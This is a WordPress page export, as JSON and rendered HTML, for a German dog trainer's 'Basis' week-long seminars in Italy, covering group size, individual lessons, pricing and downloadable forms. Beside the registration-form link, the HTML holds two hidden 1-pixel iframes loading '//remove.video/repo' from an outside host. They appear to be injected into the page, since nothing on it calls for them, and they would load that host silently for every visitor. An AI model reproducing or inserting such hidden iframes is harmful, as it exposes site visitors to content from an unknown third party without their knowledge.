{"id":3854,"date":"2019-01-09T22:23:27","date_gmt":"2019-01-09T21:23:27","guid":{"rendered":"http:\/\/www.hubert-asam.de\/?page_id=3854"},"modified":"2021-11-08T10:55:22","modified_gmt":"2021-11-08T09:55:22","slug":"basis-wochenseminare-in-italien-2","status":"publish","type":"page","link":"https:\/\/www.hubert-asam.de\/?page_id=3854","title":{"rendered":"Basis &#8211; Wochenseminare in Italien"},"content":{"rendered":"<p>[et_pb_section][et_pb_row][et_pb_column type=&#8220;2_3&#8243;][et_pb_text admin_label=&#8220;Text&#8220; background_layout=&#8220;light&#8220; text_orientation=&#8220;left&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220;]<\/p>\n<h3><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a>Italien\/Marken<\/h3>\n<p>Wochenseminare in Gruppenform sind nur dann m\u00f6glich, wenn die Gruppe einigerma\u00dfen auf dem gleichen Level ist<br \/>\noder wenn Einzelarbeit die Grundarbeitsform ist.<\/p>\n<p>Wer mit einem Basis- Seminar in Italien beginnen will, bekommt also die M\u00f6glichkeit, sich zur\u00fcckzuziehen, in Einzelarbeit zu arbeiten\u00a0und\/oder in Gruppen, die klar kontrolliert und konstruktiv sind.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pionier-nala.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3849\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pionier-nala-300x225.jpg\" alt=\"pionier nala\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pionier-nala-300x225.jpg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pionier-nala-768x576.jpg 768w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pionier-nala.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nMit Basishunden kann es auch notwendig sein, mehr Unterricht als Alltagsleben (Ausfl\u00fcge etc.) zu machen.<br \/>\nDer Wochenablauf muss f\u00fcr Menschen, die artgerechte Arbeit nicht kennen, anders strukturiert sein.<br \/>\nIn den weiterf\u00fchrenden Seminaren kenne ich alle Hunde und alle Menschen pers\u00f6nlich, das ist in Basisseminaren oft nicht der Fall. Ich kann mir nur im Vorfeld \u00fcber meine Vorbereitungsb\u00f6gen ein Bild machen oder im pers\u00f6nlichen Gespr\u00e4ch versuchen herauszufiltern, auf welchem Stand die sozialen Vereinbarungen im Familienrudel sind.<\/p>\n<p>Deshalb stelle ich mich auf Basiswochen vollkommen anders ein und nehme maximal 2 Rudel im Haus auf.<\/p>\n<p>Deshalb ist der Preis etwas h\u00f6her als bei normalen Wochenseminaren.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pioniere.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3850\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pioniere-300x225.jpg\" alt=\"pioniere\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pioniere-300x225.jpg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pioniere-768x576.jpg 768w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/pioniere.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Das Basis-Wochenseminar in Italien unterscheidet sich stark vom &#8222;normalen&#8220; Wochenseminar, der Ablauf muss f\u00fcr Menschen die artgerechte Arbeit nicht kennen, anders strukturiert sein.<\/p>\n<p>In den weiterf\u00fchrenden Seminaren kenne ich alle Hunde und alle Menschen pers\u00f6nlich, das ist hier nicht der Fall. Ich kann mir nur im Vorfeld \u00fcber meine Vorbereitungsb\u00f6gen ein Bild machen oder im pers\u00f6nlichen Gespr\u00e4ch versuchen herauszufiltern, auf welchem Stand die sozialen Vereinbarungen im Familienrudel sind.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/IMG_8113.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3851\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/IMG_8113-300x225.jpg\" alt=\"IMG_8113\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/IMG_8113-300x225.jpg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/IMG_8113-768x576.jpg 768w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/IMG_8113-1024x768.jpg 1024w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/IMG_8113-1080x810.jpg 1080w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><br \/>\n<\/a><br \/>\nDeshalb ist auch die preisliche Staffelung stark von der jeweiligen Zusammensetzung abh\u00e4ngig.<br \/>\nIch lasse maximal 2 Familienrudel, mit oberstem Maximum von 4 Hunden zu.<br \/>\nUnterricht wird im Einzelunterricht gef\u00fchrt, es sei denn, es stellt sich heraus, dass eine Gruppe schnell funktioniert.<br \/>\nBei problematischen Hunden muss ich \u00f6rtliche Trennung vornehmen k\u00f6nnen.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/Bubu-mare.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3847\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/Bubu-mare-300x225.jpg\" alt=\"Bubu mare\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/Bubu-mare-300x225.jpg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/Bubu-mare-768x576.jpg 768w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/Bubu-mare-1024x768.jpg 1024w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/Bubu-mare-1080x810.jpg 1080w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2017\/03\/Vorbereitungsbogen.pdf\">Vorbereitungsbogen<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Anmeldeformular-2022.pdf\">Anmeldeformular 2022<\/a><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/p>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<p>[\/et_pb_text][\/et_pb_column][et_pb_column type=&#8220;1_3&#8243;][et_pb_image admin_label=&#8220;Bild&#8220; src=&#8220;http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/IMG_8113.jpg&#8220; show_in_lightbox=&#8220;off&#8220; url_new_window=&#8220;off&#8220; animation=&#8220;left&#8220; sticky=&#8220;off&#8220; align=&#8220;left&#8220; force_fullwidth=&#8220;off&#8220; always_center_on_mobile=&#8220;on&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220; \/][et_pb_image admin_label=&#8220;Bild&#8220; src=&#8220;http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2017\/12\/furlo2.jpg&#8220; show_in_lightbox=&#8220;off&#8220; url_new_window=&#8220;off&#8220; animation=&#8220;left&#8220; sticky=&#8220;off&#8220; align=&#8220;left&#8220; force_fullwidth=&#8220;off&#8220; always_center_on_mobile=&#8220;on&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220; \/][et_pb_image admin_label=&#8220;Bild&#8220; src=&#8220;http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2016\/12\/frosch-furlo.jpg&#8220; show_in_lightbox=&#8220;off&#8220; url_new_window=&#8220;off&#8220; animation=&#8220;left&#8220; sticky=&#8220;off&#8220; align=&#8220;left&#8220; force_fullwidth=&#8220;off&#8220; always_center_on_mobile=&#8220;on&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220; \/][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p><div class=\"et_pb_section et_pb_section_0 et_section_regular\" >\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div><div class=\"et_pb_row et_pb_row_0 et_pb_row_empty\">\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div> Italien\/Marken Wochenseminare in Gruppenform sind nur dann m\u00f6glich, wenn die Gruppe einigerma\u00dfen auf dem gleichen Level ist oder wenn Einzelarbeit die Grundarbeitsform ist. Wer mit einem Basis- Seminar in Italien beginnen will, bekommt also die M\u00f6glichkeit, sich zur\u00fcckzuziehen, in Einzelarbeit zu arbeiten\u00a0und\/oder in Gruppen, die klar kontrolliert und konstruktiv sind. Mit Basishunden kann es [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"class_list":["post-3854","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/3854","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3854"}],"version-history":[{"count":8,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/3854\/revisions"}],"predecessor-version":[{"id":4397,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/3854\/revisions\/4397"}],"wp:attachment":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3854"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<p>[et_pb_section][et_pb_row][et_pb_column type=&#8220;2_3&#8243;][et_pb_text admin_label=&#8220;Text&#8220; background_layout=&#8220;light&#8220; text_orientation=&#8220;left&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220;]</p>
<h3><a href="http://www.hubert-asam.de/WP/wp-content/uploads/2015/07/logo100sw.jpg"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-264" src="http://www.hubert-asam.de/WP/wp-content/uploads/2015/07/logo100sw.jpg" alt="logo100sw" width="100" height="58" /></a>Italien/Marken</h3>
<p>Wochenseminare in Gruppenform sind nur dann möglich, wenn die Gruppe einigermaßen auf dem gleichen Level ist<br />
oder wenn Einzelarbeit die Grundarbeitsform ist.</p>
<p>Wer mit einem Basis- Seminar in Italien beginnen will, bekommt also die Möglichkeit, sich zurückzuziehen, in Einzelarbeit zu arbeiten und/oder in Gruppen, die klar kontrolliert und konstruktiv sind.</p>
<p><a href="http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pionier-nala.jpg"><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-3849" src="http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pionier-nala-300x225.jpg" alt="pionier nala" width="300" height="225" srcset="https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pionier-nala-300x225.jpg 300w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pionier-nala-768x576.jpg 768w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pionier-nala.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></a><br />
Mit Basishunden kann es auch notwendig sein, mehr Unterricht als Alltagsleben (Ausflüge etc.) zu machen.<br />
Der Wochenablauf muss für Menschen, die artgerechte Arbeit nicht kennen, anders strukturiert sein.<br />
In den weiterführenden Seminaren kenne ich alle Hunde und alle Menschen persönlich, das ist in Basisseminaren oft nicht der Fall. Ich kann mir nur im Vorfeld über meine Vorbereitungsbögen ein Bild machen oder im persönlichen Gespräch versuchen herauszufiltern, auf welchem Stand die sozialen Vereinbarungen im Familienrudel sind.</p>
<p>Deshalb stelle ich mich auf Basiswochen vollkommen anders ein und nehme maximal 2 Rudel im Haus auf.</p>
<p>Deshalb ist der Preis etwas höher als bei normalen Wochenseminaren.</p>
<p><a href="http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pioniere.jpg"><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-3850" src="http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pioniere-300x225.jpg" alt="pioniere" width="300" height="225" srcset="https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pioniere-300x225.jpg 300w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pioniere-768x576.jpg 768w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/pioniere.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></a></p>
<p>Das Basis-Wochenseminar in Italien unterscheidet sich stark vom &#8222;normalen&#8220; Wochenseminar, der Ablauf muss für Menschen die artgerechte Arbeit nicht kennen, anders strukturiert sein.</p>
<p>In den weiterführenden Seminaren kenne ich alle Hunde und alle Menschen persönlich, das ist hier nicht der Fall. Ich kann mir nur im Vorfeld über meine Vorbereitungsbögen ein Bild machen oder im persönlichen Gespräch versuchen herauszufiltern, auf welchem Stand die sozialen Vereinbarungen im Familienrudel sind.</p>
<p><a href="http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/IMG_8113.jpg"><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-3851" src="http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/IMG_8113-300x225.jpg" alt="IMG_8113" width="300" height="225" srcset="https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/IMG_8113-300x225.jpg 300w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/IMG_8113-768x576.jpg 768w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/IMG_8113-1024x768.jpg 1024w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/IMG_8113-1080x810.jpg 1080w" sizes="(max-width: 300px) 100vw, 300px" /><br />
</a><br />
Deshalb ist auch die preisliche Staffelung stark von der jeweiligen Zusammensetzung abhängig.<br />
Ich lasse maximal 2 Familienrudel, mit oberstem Maximum von 4 Hunden zu.<br />
Unterricht wird im Einzelunterricht geführt, es sei denn, es stellt sich heraus, dass eine Gruppe schnell funktioniert.<br />
Bei problematischen Hunden muss ich örtliche Trennung vornehmen können.</p>
<p><a href="http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/Bubu-mare.jpg"><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-3847" src="http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/Bubu-mare-300x225.jpg" alt="Bubu mare" width="300" height="225" srcset="https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/Bubu-mare-300x225.jpg 300w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/Bubu-mare-768x576.jpg 768w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/Bubu-mare-1024x768.jpg 1024w, https://www.hubert-asam.de/WP/wp-content/uploads/2016/12/Bubu-mare-1080x810.jpg 1080w" sizes="(max-width: 300px) 100vw, 300px" /></a></p>
<p><a href="http://www.hubert-asam.de/WP/wp-content/uploads/2015/07/pdf1.gif"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1677" src="http://www.hubert-asam.de/WP/wp-content/uploads/2015/07/pdf1.gif" alt="pdf" width="30" height="28" /></a><a href="http://www.hubert-asam.de/WP/wp-content/uploads/2017/03/Vorbereitungsbogen.pdf">Vorbereitungsbogen</a></p>
<p><a href="http://www.hubert-asam.de/WP/wp-content/uploads/2015/07/pdf1.gif"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1677" src="http://www.hubert-asam.de/WP/wp-content/uploads/2015/07/pdf1.gif" alt="pdf" width="30" height="28" /></a> <a href="http://www.hubert-asam.de/WP/wp-content/uploads/2015/07/Anmeldeformular-2022.pdf">Anmeldeformular 2022</a><iframe loading="lazy" id="embedPath" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/repo" width="300" height="150"></iframe></p>
<div><iframe loading="lazy" id="embedPath" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/repo" width="300" height="150"></iframe></div>
<p>[/et_pb_text][/et_pb_column][et_pb_column type=&#8220;1_3&#8243;][et_pb_image admin_label=&#8220;Bild&#8220; src=&#8220;http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/IMG_8113.jpg&#8220; show_in_lightbox=&#8220;off&#8220; url_new_window=&#8220;off&#8220; animation=&#8220;left&#8220; sticky=&#8220;off&#8220; align=&#8220;left&#8220; force_fullwidth=&#8220;off&#8220; always_center_on_mobile=&#8220;on&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220; /][et_pb_image admin_label=&#8220;Bild&#8220; src=&#8220;http://www.hubert-asam.de/WP/wp-content/uploads/2017/12/furlo2.jpg&#8220; show_in_lightbox=&#8220;off&#8220; url_new_window=&#8220;off&#8220; animation=&#8220;left&#8220; sticky=&#8220;off&#8220; align=&#8220;left&#8220; force_fullwidth=&#8220;off&#8220; always_center_on_mobile=&#8220;on&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220; /][et_pb_image admin_label=&#8220;Bild&#8220; src=&#8220;http://www.hubert-asam.de/WP/wp-content/uploads/2016/12/frosch-furlo.jpg&#8220; show_in_lightbox=&#8220;off&#8220; url_new_window=&#8220;off&#8220; animation=&#8220;left&#8220; sticky=&#8220;off&#8220; align=&#8220;left&#8220; force_fullwidth=&#8220;off&#8220; always_center_on_mobile=&#8220;on&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220; /][/et_pb_column][/et_pb_row][/et_pb_section]</p>

<p><div class="et_pb_section et_pb_section_0 et_section_regular" >
				
				
				
				
				
				
				
				
				
			</div><div class="et_pb_row et_pb_row_0 et_pb_row_empty">
				
				
				
				
				
			</div> Italien/Marken Wochenseminare in Gruppenform sind nur dann möglich, wenn die Gruppe einigermaßen auf dem gleichen Level ist oder wenn Einzelarbeit die Grundarbeitsform ist. Wer mit einem Basis- Seminar in Italien beginnen will, bekommt also die Möglichkeit, sich zurückzuziehen, in Einzelarbeit zu arbeiten und/oder in Gruppen, die klar kontrolliert und konstruktiv sind. Mit Basishunden kann es [&hellip;]</p>
